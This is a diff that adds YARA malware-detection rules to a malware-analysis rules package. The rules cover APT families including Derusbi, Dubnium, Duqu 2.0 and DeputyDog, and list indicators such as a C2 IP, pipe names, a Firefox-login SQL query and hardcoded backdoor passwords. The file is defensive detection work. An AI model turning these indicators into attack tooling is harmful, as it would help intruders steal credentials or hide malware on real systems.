+		$s2 = "http.exe" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 1000KB and ( all of ($s*) ) )
+}
+
+rule Mal_http_EXE {
+	meta:
+		description = "Detects trojan from APT report named http.exe"
+		author = "Florian Roth"
+		reference = "https://goo.gl/13Wgy1"
+		date = "2016-05-25"
+		score = 80
+		hash1 = "ad191d1d18841f0c5e48a5a1c9072709e2dd6359a6f6d427e0de59cfcd1d9666"
+	strings:
+		$x1 = "Content-Disposition: form-data; name=\"file1\"; filename=\"%s\"" fullword ascii
+		$x2 = "%ALLUSERSPROFILE%\\Accessories\\wordpade.exe" fullword ascii
+		$x3 = "\\dumps.dat" fullword ascii
+		$x4 = "\\wordpade.exe" fullword ascii
+		$x5 = "\\%s|%s|4|%d|%4d-%02d-%02d %02d:%02d:%02d|" fullword ascii
+		$x6 = "\\%s|%s|5|%d|%4d-%02d-%02d %02d:%02d:%02d|" fullword ascii
+		$x7 = "cKaNBh9fnmXgJcSBxx5nFS+8s7abcQ==" fullword ascii
+		$x8 = "cKaNBhFLn1nXMcCR0RlbMQ==" fullword ascii /* base64: pKY1[1 */
+
+		$s1 = "SELECT * FROM moz_logins;" fullword ascii
+		$s2 = "makescr.dat" fullword ascii
+		$s3 = "%s\\Mozilla\\Firefox\\profiles.ini" fullword ascii
+		$s4 = "?moz-proxy://" fullword ascii
+		$s5 = "[%s-%s] Title: %s" fullword ascii
+		$s6 = "Cforeign key mismatch - \"%w\" referencing \"%w\"" fullword ascii
+		$s7 = "Windows 95 SR2" fullword ascii
+		$s8 = "\\|%s|0|0|" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 2000KB and ( 1 of ($x*) and 2 of ($s*) ) ) or ( 3 of ($x*) )
+}
+
+rule Mal_PotPlayer_DLL {
+	meta:
+		description = "Detects a malicious PotPlayer.dll"
+		author = "Florian Roth"
+		reference = "https://goo.gl/13Wgy1"
+		date = "2016-05-25"
+		score = 70
+		hash1 = "705409bc11fb45fa3c4e2fa9dd35af7d4613e52a713d9c6ea6bc4baff49aa74a"
+	strings:
+		$x1 = "C:\\Users\\john\\Desktop\\PotPlayer\\Release\\PotPlayer.pdb" fullword ascii
+
+		$s3 = "PotPlayer.dll" fullword ascii
+		$s4 = "\\update.dat" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 200KB and $x1 or all of ($s*)
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_DeputyDog_Fexel.yar remnux-rules-0.0.4/yara/malware/APT_DeputyDog_Fexel.yar
--- remnux-rules-0.0.3/yara/malware/APT_DeputyDog_Fexel.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_DeputyDog_Fexel.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,35 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+import "pe"
+
+rule APT_DeputyDog_Fexel
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$180 = "180.150.228.102" wide ascii
+	$0808cmd = {25 30 38 78 30 38 78 00 5C 00 63 00 6D 00 64 00 2E 00 65 00 78 00 65 [2-6] 43 00 61 00 6E 00 27 00 74 00 20 00 6F 00 70 00 65 00 6E 00 20 00 73 00 68 00 65 00 6C 00 6C 00 21}
+	$cUp = "Upload failed! [Remote error code:" nocase wide ascii
+	$DGGYDSYRL = {00 44 47 47 59 44 53 59 52 4C 00}
+	$GDGSYDLYR = "GDGSYDLYR_%" wide ascii
+condition:
+	any of them
+}
+
+rule APT_DeputyDog
+{
+    meta:
+        Author      = "FireEye Labs"
+        Date        = "2013/09/21"
+        Description = "detects string seen in samples used in 2013-3893 0day attacks"
+        Reference   = "https://www.fireeye.com/blog/threat-research/2013/09/operation-deputydog-zero-day-cve-2013-3893-attack-against-japanese-targets.html"
+
+    strings:
+        $mz = {4d 5a}
+        $a = "DGGYDSYRL"
+
+    condition:
+        ($mz at 0) and $a
+}
\ No newline at end of file
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Derusbi.yar remnux-rules-0.0.4/yara/malware/APT_Derusbi.yar
--- remnux-rules-0.0.3/yara/malware/APT_Derusbi.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Derusbi.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,349 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+
+import "pe"
+
+rule apt_nix_elf_derusbi
+{
+        meta:
+        Author = "@seifreed"
+	strings:
+		$ = "LxMain"
+		$ = "execve"
+		$ = "kill"
+		$ = "cp -a %s %s"
+		$ = "%s &"
+		$ = "dbus-daemon"
+		$ = "--noprofile"
+		$ = "--norc"
+		$ = "TERM=vt100"
+		$ = "/proc/%u/cmdline"
+		$ = "loadso"
+		$ = "/proc/self/exe"
+		$ = "Proxy-Connection: Keep-Alive"
+		$ = "Connection: Keep-Alive"
+		$ = "CONNECT %s"
+		$ = "HOST: %s:%d"
+		$ = "User-Agent: Mozilla/4.0"
+		$ = "Proxy-Authorization: Basic %s"
+		$ = "Server: Apache"
+		$ = "Proxy-Authenticate"
+		$ = "gettimeofday"
+		$ = "pthread_create"
+		$ = "pthread_join"
+		$ = "pthread_mutex_init"
+		$ = "pthread_mutex_destroy"
+		$ = "pthread_mutex_lock"
+		$ = "getsockopt"
+		$ = "socket"
+		$ = "setsockopt"
+		$ = "select"
+		$ = "bind"
+		$ = "shutdown"
+		$ = "listen"
+		$ = "opendir"
+		$ = "readdir"
+		$ = "closedir"
+		$ = "rename"
+
+	condition:
+		(uint32(0) == 0x4464c457f) and (all of them)
+}
+rule apt_nix_elf_derusbi_kernelModule
+{
+	meta:
+        Author = "@seifreed"
+	strings:
+		$ = "__this_module"   
+		$ = "init_module"      
+		$ = "unhide_pid"       
+		$ = "is_hidden_pid"    
+		$ = "clear_hidden_pid" 
+		$ = "hide_pid"
+		$ = "license"
+		$ = "description"
+		$ = "srcversion="
+		$ = "depends="
+		$ = "vermagic="
+		$ = "current_task"
+		$ = "sock_release"
+		$ = "module_layout"
+		$ = "init_uts_ns"
+		$ = "init_net"
+		$ = "init_task"
+		$ = "filp_open"
+		$ = "__netlink_kernel_create"
+		$ = "kfree_skb"
+
+	condition:
+		(uint32(0) == 0x4464c457f) and (all of them)
+}
+rule apt_nix_elf_Derusbi_Linux_SharedMemCreation
+{
+	meta:
+        Author = "@seifreed"
+	strings:
+		$byte1 = { B6 03 00 00 ?? 40 00 00 00 ?? 0D 5F 01 82 }
+	condition:
+		(uint32(0) == 0x464C457F) and (any of them)
+}
+
+rule apt_nix_elf_Derusbi_Linux_Strings
+{
+	meta:
+        Author = "@seifreed"
+        strings:
+    	$a1 = "loadso" wide ascii fullword
+        	$a2 = "\nuname -a\n\n" wide ascii
+        	$a3 = "/dev/shm/.x11.id" wide ascii
+        	$a4 = "LxMain64" wide ascii nocase
+        	$a5 = "# \\u@\\h:\\w \\$ " wide ascii
+        	$b1 = "0123456789abcdefghijklmnopqrstuvwxyz" wide
+        	$b2 = "0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ" wide
+			$b3 = "ret %d" wide fullword
+        	$b4 = "uname -a\n\n" wide ascii
+        	$b5 = "/proc/%u/cmdline" wide ascii
+			$b6 = "/proc/self/exe" wide ascii
+			$b7 = "cp -a %s %s" wide ascii
+			$c1 = "/dev/pts/4" wide ascii fullword
+        	$c2 = "/tmp/1408.log" wide ascii fullword
+	condition:
+		uint32(0) == 0x464C457F and
+		((1 of ($a*) and 4 of ($b*)) or
+		(1 of ($a*) and 1 of ($c*)) or
+		2 of ($a*) or
+		all of ($b*))
+}
+
+rule apt_win_exe_trojan_derusbi
+{
+   meta:
+          Author = "@seifreed"
+   strings:
+	  $sa_1 = "USB" wide ascii
+	  $sa_2 = "RAM" wide ascii
+	  $sa_3 = "SHARE" wide ascii
+	  $sa_4 = "HOST: %s:%d"
+	  $sa_5 = "POST"
+	  $sa_6 = "User-Agent: Mozilla"
+	  $sa_7 = "Proxy-Connection: Keep-Alive"
+	  $sa_8 = "Connection: Keep-Alive"
+	  $sa_9 = "Server: Apache"
+	  $sa_10 = "HTTP/1.1"
+	  $sa_11 = "ImagePath"
+	  $sa_12 = "ZwUnloadDriver"
+	  $sa_13 = "ZwLoadDriver"
+	  $sa_14 = "ServiceMain"
+	  $sa_15 = "regsvr32.exe"
+	  $sa_16 = "/s /u" wide ascii
+	  $sa_17 = "rand"
+	  $sa_18 = "_time64"
+	  $sa_19 = "DllRegisterServer"
+	  $sa_20 = "DllUnregisterServer"
+	  $sa_21 = { 8b [5] 8b ?? d3 ?? 83 ?? 08 30 [5] 40 3b [5] 72 } // Decode Driver
+
+	  $sb_1 = "PCC_CMD_PACKET"
+	  $sb_2 = "PCC_CMD"
+	  $sb_3 = "PCC_BASEMOD"
+	  $sb_4 = "PCC_PROXY"
+	  $sb_5 = "PCC_SYS"
+	  $sb_6 = "PCC_PROCESS"
+	  $sb_7 = "PCC_FILE"
+	  $sb_8 = "PCC_SOCK"
+	 
+	  $sc_1 = "bcdedit -set testsigning" wide ascii
+	  $sc_2 = "update.microsoft.com" wide ascii
+	  $sc_3 = "_crt_debugger_hook" wide ascii
+	  $sc_4 = "ue8G5" wide ascii
+	 
+	  $sd_1 = "NET" wide ascii
+	  $sd_2 = "\\\\.\\pipe\\%s" wide ascii
+	  $sd_3 = ".dat" wide ascii
+	  $sd_4 = "CONNECT %s:%d" wide ascii
+	  $sd_5 = "\\Device\\" wide ascii
+	 
+	  $se_1 = "-%s-%04d" wide ascii
+	  $se_2 = "-%04d" wide ascii
+	  $se_3 = "FAL" wide ascii
+	  $se_4 = "OK" wide ascii
+	  $se_5 = "2.03" wide ascii
+	  $se_6 = "XXXXXXXXXXXXXXX" wide ascii
+
+   condition:
+	  (uint16(0) == 0x5A4D) and ( (all of ($sa_*)) or (
+		 (13 of ($sa_*)) and
+			( (5 of ($sb_*)) or (3 of ($sc_*)) or (all of ($sd_*)) or
+			   ( (1 of ($sc_*)) and (all of ($se_*)) ) ) ) )
+}
+
+
+rule Trojan_Derusbi {
+    meta:
+        Author = "RSA_IR"
+        Date     = "4Sept13"
+        File     = "derusbi_variants v 1.3"
+        MD5      = " c0d4c5b669cc5b51862db37e972d31ec "
+
+    strings:
+        $b1 = {8b 15 ?? ?? ?? ?? 8b ce d3 ea 83 c6 ?? 30 90 ?? ?? ?? ?? 40 3b 05 ?? ?? ?? ?? 72 ??}
+        $b2 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E F7 5D 88 2E 0C A2 88 2E 4B 5D 88 2E F3 5D 88 2E}
+        $b3 = {4E E6 40 BB}
+        $b4 = {B1 19 BF 44}
+        $b5 = {6A F5 44 3D ?? ?? 00 00 27 AF D4 3D 69 F5 44 3D 6E F5 44 3D 95 0A 44 3D D2 F5 44 3D 6A F5 44 3D}
+        $b6 = {F3 5D 88 2E ?? ?? 00 00 BE 07 18 2E F0 5D 88 2E}
+        $b7 = {D6 D5 A4 A3 ?? ?? 00 00 9B 8F 34 A3 D5 D5 A4 A3 D2 D5 A4 A3 29 2A A4 A3}
+        $b8 = {C3 76 33 9F ?? ?? 00 00 8E 2C A3 9F C0 76 33 9F C7 76 33 9F 3C 89 33 9F}
+
+    condition:
+        2 of ($b1, $b2, $b3, $b4) and 1 of ($b5, $b6, $b7, $b8)
+}
+
+rule APT_Derusbi_DeepPanda
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+	reference = "http://www.crowdstrike.com/sites/default/files/AdversaryIntelligenceReport_DeepPanda_0.pdf"
+strings:
+	$D = "Dom4!nUserP4ss" wide ascii
+condition:
+	$D
+}
+
+
+rule APT_Derusbi_Gen
+{
+meta:
+	author = "ThreatConnect Intelligence Research Team"
+strings:
+	$2 = "273ce6-b29f-90d618c0" wide ascii
+	$A = "Ace123dx" fullword wide ascii
+	$A1 = "Ace123dxl!" fullword wide ascii
+	$A2 = "Ace123dx!@#x" fullword wide ascii
+	$C = "/Catelog/login1.asp" wide ascii
+	$DF = "~DFTMP$$$$$.1" wide ascii
+	$G = "GET /Query.asp?loginid=" wide ascii
+	$L = "LoadConfigFromReg failded" wide ascii
+	$L1 = "LoadConfigFromBuildin success" wide ascii
+	$ph = "/photoe/photo.asp HTTP" wide ascii
+	$PO = "POST /photos/photo.asp" wide ascii
+	$PC = "PCC_IDENT" wide ascii
+condition:
+	any of them
+}
+/*
+	Yara Rule Set
+	Author: Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud
+	Date: 2015-12-09
+   Reference = http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family
+	Identifier: Derusbi Dez 2015
+*/
+
+rule derusbi_kernel
+{
+    meta:
+        description = "Derusbi Driver version"
+        date = "2015-12-09"
+        author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
+    strings:
+        $token1 = "$$$--Hello"
+        $token2 = "Wrod--$$$"
+        $cfg = "XXXXXXXXXXXXXXX"
+        $class = ".?AVPCC_BASEMOD@@"
+        $MZ = "MZ"
+    condition:
+        $MZ at 0 and $token1 and $token2 and $cfg and $class
+}
+
+rule derusbi_linux
+{
+    meta:
+        description = "Derusbi Server Linux version"
+        date = "2015-12-09"
+        author = "Airbus Defence and Space Cybersecurity CSIRT - Fabien Perigaud"
+    strings:
+        $PS1 = "PS1=RK# \\u@\\h:\\w \\$"
+        $cmd = "unset LS_OPTIONS;uname -a"
+        $pname = "[diskio]"
+        $rkfile = "/tmp/.secure"
+        $ELF = "\x7fELF"
+    condition:
+        $ELF at 0 and $PS1 and $cmd and $pname and $rkfile
+}
+
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2015-12-15
+	Identifier: Derusbi Dez 2015
+*/
+
+rule Derusbi_Kernel_Driver_WD_UDFS {
+	meta:
+		description = "Detects Derusbi Kernel Driver"
+		author = "Florian Roth"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		date = "2015-12-15"
+		score = 80
+		hash1 = "1b449121300b0188ff9f6a8c399fb818d0cf53fd36cf012e6908a2665a27f016"
+		hash2 = "50174311e524b97ea5cb4f3ea571dd477d1f0eee06cd3ed73af39a15f3e6484a"
+		hash3 = "6cdb65dbfb2c236b6d149fd9836cb484d0608ea082cf5bd88edde31ad11a0d58"
+		hash4 = "e27fb16dce7fff714f4b05f2cef53e1919a34d7ec0e595f2eaa155861a213e59"
+	strings:
+      $x1 = "\\\\.\\pipe\\usbpcex%d" fullword wide
+      $x2 = "\\\\.\\pipe\\usbpcg%d" fullword wide
+      $x3 = "\\??\\pipe\\usbpcex%d" fullword wide
+		$x4 = "\\??\\pipe\\usbpcg%d" fullword wide
+      $x5 = "$$$--Hello" fullword ascii
+      $x6 = "Wrod--$$$" fullword ascii
+
+		$s1 = "\\Registry\\User\\%s\\Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings" fullword wide
+		$s2 = "Update.dll" fullword ascii
+		$s3 = "\\Registry\\Machine\\SYSTEM\\CurrentControlSet\\Control\\WMI" fullword wide
+		$s4 = "\\Driver\\nsiproxy" fullword wide
+		$s5 = "HOST: %s" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 800KB and
+      (
+         2 of ($x*) or all of ($s*)
+      )
+}
+
+rule Derusbi_Code_Signing_Cert {
+	meta:
+		description = "Detects an executable signed with a certificate also used for Derusbi Trojan - suspicious"
+		author = "Florian Roth"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		date = "2015-12-15"
+		score = 40
+   strings:
+      $s1 = "Fuqing Dawu Technology Co.,Ltd.0" fullword ascii
+      $s2 = "XL Games Co.,Ltd.0" fullword ascii
+      $s3 = "Wemade Entertainment co.,Ltd0" fullword ascii
+   condition:
+      uint16(0) == 0x5a4d and filesize < 800KB and 1 of them
+}
+
+rule XOR_4byte_Key {
+	meta:
+		description = "Detects an executable encrypted with a 4 byte XOR (also used for Derusbi Trojan)"
+		author = "Florian Roth"
+		reference = "http://blog.airbuscybersecurity.com/post/2015/11/Newcomers-in-the-Derusbi-family"
+		date = "2015-12-15"
+		score = 60
+   strings:
+      /* Op Code */
+      $s1 = { 85 C9 74 0A 31 06 01 1E 83 C6 04 49 EB F2 }
+      /*
+      test    ecx, ecx
+      jz      short loc_590170
+      xor     [esi], eax
+      add     [esi], ebx
+      add     esi, 4
+      dec     ecx
+      jmp     short loc_590162
+      */
+   condition:
+      uint16(0) == 0x5a4d and filesize < 900KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Dubnium.yar remnux-rules-0.0.4/yara/malware/APT_Dubnium.yar
--- remnux-rules-0.0.3/yara/malware/APT_Dubnium.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Dubnium.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,138 @@
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-06-10
+	Identifier: Dubnium
+*/
+
+/* Rule Set ----------------------------------------------------------------- */
+
+rule Dubnium_Sample_1 {
+	meta:
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth"
+		reference = "https://goo.gl/AW9Cuu"
+		date = "2016-06-10"
+		hash1 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+	strings:
+		$key1 = "3b840e20e9555e9fb031c4ba1f1747ce25cc1d0ff664be676b9b4a90641ff194" fullword ascii
+		$key2 = "90631f686a8c3dbc0703ffa353bc1fdf35774568ac62406f98a13ed8f47595fd" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 2000KB and all of them
+}
+
+rule Dubnium_Sample_2 {
+	meta:
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth"
+		reference = "https://goo.gl/AW9Cuu"
+		date = "2016-06-10"
+		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+	strings:
+		$x1 = ":*:::D:\\:c:~:" fullword ascii
+		$s2 = "SPMUVR" fullword ascii
+	condition:
+		( uint16(0) == 0x5a4d and filesize < 2000KB and all of them )
+}
+
+rule Dubnium_Sample_3 {
+	meta:
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth"
+		reference = "https://goo.gl/AW9Cuu"
+		date = "2016-06-10"
+		hash1 = "caefcdf2b4e5a928cdf9360b70960337f751ec4a5ab8c0b75851fc9a1ab507a8"
+		hash2 = "e0362d319a8d0e13eda782a0d8da960dd96043e6cc3500faeae521d1747576e5"
+		hash3 = "a77d1c452291a6f2f6ed89a4bac88dd03d38acde709b0061efd9f50e6d9f3827"
+	strings:
+		$x1 = "copy /y \"%s\" \"%s\" " fullword ascii
+		$x2 = "del /f \"%s\" " fullword ascii
+		$s1 = "del /f /ah \"%s\" " fullword ascii
+		$s2 = "if exist \"%s\" goto Rept " fullword ascii
+		$s3 = "\\*.*.lnk" fullword ascii
+		$s4 = "Dropped" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 2000KB and 5 of them
+}
+
+rule Dubnium_Sample_5 {
+	meta:
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth"
+		reference = "https://goo.gl/AW9Cuu"
+		date = "2016-06-10"
+		super_rule = 1
+		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash6 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+		hash7 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash8 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash9 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+	strings:
+		$s1 = "$innn[i$[i$^i[e[mdi[m$jf1Wehn[^Whl[^iin_hf$11mahZijnjbi[^[W[f1n$dej$[hn]1[W1ni1l[ic1j[mZjchl$$^he[[j[a[1_iWc[e[" fullword ascii
+		$s2 = "h$YWdh[$ij7^e$n[[_[h[i[[[\\][1$1[[j1W1[1cjm1[$[k1ZW_$$ncn[[Inbnnc[I9enanid[fZCX" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 9000KB and all of them
+}
+
+rule Dubnium_Sample_6 {
+	meta:
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth"
+		reference = "https://goo.gl/AW9Cuu"
+		date = "2016-06-10"
+		super_rule = 1
+		hash1 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash2 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash3 = "839baf85de657b6d6503b6f94054efa8841f667987a9c805eab94a85a859e1ba"
+	strings:
+		$s1 = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ!@#$%^&()`~-_=+[{]{;',." fullword ascii
+		$s2 = "e_$0[bW\\RZY\\jb\\ZY[nimiRc[jRZ]" fullword ascii
+		$s3 = "f_RIdJ0W9RFb[$Fbc9[k_?Wn" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 4000KB and all of them
+}
+
+rule Dubnium_Sample_7 {
+	meta:
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth"
+		reference = "https://goo.gl/AW9Cuu"
+		date = "2016-06-10"
+		super_rule = 1
+		hash1 = "16f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "1feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "5246899b8c74a681e385cbc1dd556f9c73cf55f2a0074c389b3bf823bfc6ce4b"
+		hash5 = "5f07b074414513b73e202d7f77ec4bcf048f13dd735c9be3afcf25be818dc8e0"
+		hash6 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash7 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash8 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+	strings:
+		$s1 = "hWI[$lZ![nJ_[[lk[8Ihlo8ZiIl[[[$Ynk[f_8[88WWWJW[YWnl$$Z[ilf!$IZ$!W>Wl![W!k!$l!WoW8$nj8![8n_I^$[>_n[ZY[[Xhn_c!nnfK[!Z" fullword ascii
+		$s2 = "[i_^])[$n!]Wj^,h[,!WZmk^o$dZ[h[e!&W!l[$nd[d&)^Z\\^[[iWh][[[jPYO[g$$e&n\\,Wfg$[<g$[[ninn:j!!)Wk[nj[[o!!Y" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 9000KB and all of them
+}
+
+rule Dubnium_Sample_SSHOpenSSL {
+	meta:
+		description = "Detects sample mentioned in the Dubnium Report"
+		author = "Florian Roth"
+		reference = "https://goo.gl/AW9Cuu"
+		date = "2016-06-10"
+		hash1 = "6f0b05d5e8546ab1504b07b0eaa0e8de14bca7c1555fd114c4c1c51d5a4c06b"
+		hash2 = "feaad03f6c0b57f5f5b02aef668e26001e5a7787bb51966d50c8fcf344fb4e8"
+		hash3 = "41ecd81bc7df4b47d713e812f2b7b38d3ac4b9dcdc13dd5ca61763a4bf300dcf"
+		hash4 = "bd780f4d56214c78045454d31d83ae18ed209cc138e75d138e72976a7ef9803f"
+		hash5 = "a25715108d2859595959879ff50085bc85969e9473ecc3d26dda24c4a17822c9"
+		hash6 = "e0918072d427d12b43f436bf0797a361996ae436047d4ef8277f11caf2dd481b"
+	strings:
+		$s1 = "sshkeypairgen.exe" fullword wide
+		$s2 = "OpenSSL: FATAL" fullword ascii
+	condition:
+		uint16(0) == 0x5a4d and filesize < 9000KB and all of them
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Duqu2.yar remnux-rules-0.0.4/yara/malware/APT_Duqu2.yar
--- remnux-rules-0.0.3/yara/malware/APT_Duqu2.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Duqu2.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,63 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as long as you use it under this license.
+*/
+
+rule apt_duqu2_loaders {
+
+meta:
+	copyright = "Kaspersky Lab"
+	description = "Rule to detect Duqu 2.0 samples"
+	last_modified = "2015-06-09"
+	version = "1.0"
+
+strings:
+	$a1="{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
+	$a2="\\\\.\\pipe\\{AAFFC4F0-E04B-4C7C-B40A-B45DE971E81E}" wide
+	$a4="\\\\.\\pipe\\{AB6172ED-8105-4996-9D2A-597B5F827501}" wide
+	$a5="Global\\{B54E3268-DE1E-4c1e-A667-2596751403AD}" wide
+	$a8="SELECT `Data` FROM `Binary` WHERE `Name`=’%s%i'" wide
+	$a9="SELECT `Data` FROM `Binary` WHERE `Name`=’CryptHash%i'" wide
+	$a7="SELECT `%s` FROM `%s` WHERE `%s`=’CAData%i'" wide
+	
+	$b1="MSI.dll"
+	$b2="msi.dll"
+	$b3="StartAction"
+
+	$c1="msisvc_32@" wide
+	$c2="PROP=" wide
+	$c3="-Embedding" wide
+	$c4="S:(ML;;NW;;;LW)" wide
+
+	$d1 = "NameTypeBinaryDataCustomActionActionSourceTargetInstallExecuteSequenceConditionSequencePropertyValueMicrosoftManufacturer" nocase
+	$d2 = {2E 3F 41 56 3F 24 5F 42 69 6E 64 40 24 30 30 58 55 3F 24 5F 50 6D 66 5F 77 72 61 70 40 50 38 43 4C 52 ?? 40 40 41 45 58 58 5A 58 56 31 40 24 24 24 56 40 73 74 64 40 40 51 41 56 43 4C 52 ?? 40 40 40 73 74 64 40 40}
+
+condition:
+	( (uint16(0) == 0x5a4d) and ( (any of ($a*)) or (all of ($b*)) or (all of ($c*)) ) and filesize < 100000 )
+
+	or 
+
+	( (uint32(0) == 0xe011cfd0) and ( (any of ($a*)) or (all of ($b*)) or (all of ($c*)) or (any of ($d*)) ) and filesize < 20000000 )
+}
+
+
+rule apt_duqu2_drivers {
+
+meta:
+	copyright = "Kaspersky Lab"
+	description = "Rule to detect Duqu 2.0 drivers"
+	last_modified = "2015-06-09"
+	version = "1.0"
+
+strings:
+	$a1="\\DosDevices\\port_optimizer" wide nocase
+	$a2="romanian.antihacker"
+	$a3="PortOptimizerTermSrv" wide
+	$a4="ugly.gorilla1"
+
+	$b1="NdisIMCopySendCompletePerPacketInfo"
+	$b2="NdisReEnumerateProtocolBindings"
+	$b3="NdisOpenProtocolConfiguration"
+
+condition:
+	uint16(0) == 0x5A4D and (any of ($a*) ) and (2 of ($b*)) and filesize < 100000
+}
diff -Nru remnux-rules-0.0.3/yara/malware/APT_Emissary.yar remnux-rules-0.0.4/yara/malware/APT_Emissary.yar
--- remnux-rules-0.0.3/yara/malware/APT_Emissary.yar	1970-01-01 00:00:00.000000000 +0000
+++ remnux-rules-0.0.4/yara/malware/APT_Emissary.yar	2016-06-24 20:07:22.000000000 +0000
@@ -0,0 +1,45 @@
+/*
+    This Yara ruleset is under the GNU-GPLv2 license (http://www.gnu.org/licenses/gpl-2.0.html) and open to any user or organization, as    long as you use it under this license.
+
+*/
+/*
+	Yara Rule Set
+	Author: Florian Roth
+	Date: 2016-01-02
+	Identifier: Emissary Malware
+*/
+
+rule Emissary_APT_Malware_1 {
+	meta:
+		description = "Detect Emissary Malware - from samples A08E81B411.DAT, ishelp.dll"
+		author = "Florian Roth"
+		reference = "http://goo.gl/V0epcf"
+		date = "2016-01-02"
+		score = 75
+		hash1 = "9420017390c598ee535c24f7bcbd39f40eca699d6c94dc35bcf59ddf918c59ab"
+		hash2 = "70561f58c9e5868f44169854bcc906001947d98d15e9b4d2fbabd1262d938629"
+		hash3 = "0e64e68f6f88b25530699a1cd12f6f2790ea98e6e8fa3b4bc279f8e5c09d7290"
+		hash4 = "69caa2a4070559d4cafdf79020c4356c721088eb22398a8740dea8d21ae6e664"
+		hash5 = "675869fac21a94c8f470765bc6dd15b17cc4492dd639b878f241a45b2c3890fc"
+		hash6 = "e817610b62ccd00bdfc9129f947ac7d078d97525e9628a3aa61027396dba419b"
+		hash7 = "a8b0d084949c4f289beb4950f801bf99588d1b05f68587b245a31e8e82f7a1b8"
+		hash8 = "acf7dc5a10b00f0aac102ecd9d87cd94f08a37b2726cb1e16948875751d04cc9"
+		hash9 = "e21b47dfa9e250f49a3ab327b7444902e545bed3c4dcfa5e2e990af20593af6d"
+		hash10 = "e369417a7623d73346f6dff729e68f7e057f7f6dae7bb03d56a7510cb3bfe538"
